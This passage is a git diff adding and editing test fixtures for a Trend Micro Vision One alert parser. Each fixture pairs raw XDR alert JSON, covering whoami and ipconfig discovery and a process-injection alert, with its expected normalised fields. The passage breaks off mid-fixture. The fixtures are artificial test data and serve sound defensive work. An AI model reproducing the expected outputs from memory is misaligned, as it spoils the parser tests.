@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": 
[\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": 
\"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], 
\"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": 
\"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": 
\"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": 
[\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": 
\"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file 
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index b31951fe2..5b8dbfc95 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -24,6 +24,7 @@ "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" }, "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", "ip": [ "1.2.3.4" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 9c013b1c0..9a41ea92c 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -24,6 +24,7 @@ "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" }, "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", "ip": [ "10.10.58.51" ], diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json new file mode 100644 index 000000000..dbeed8e8e --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json 
@@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": 
\"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": 
[\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": 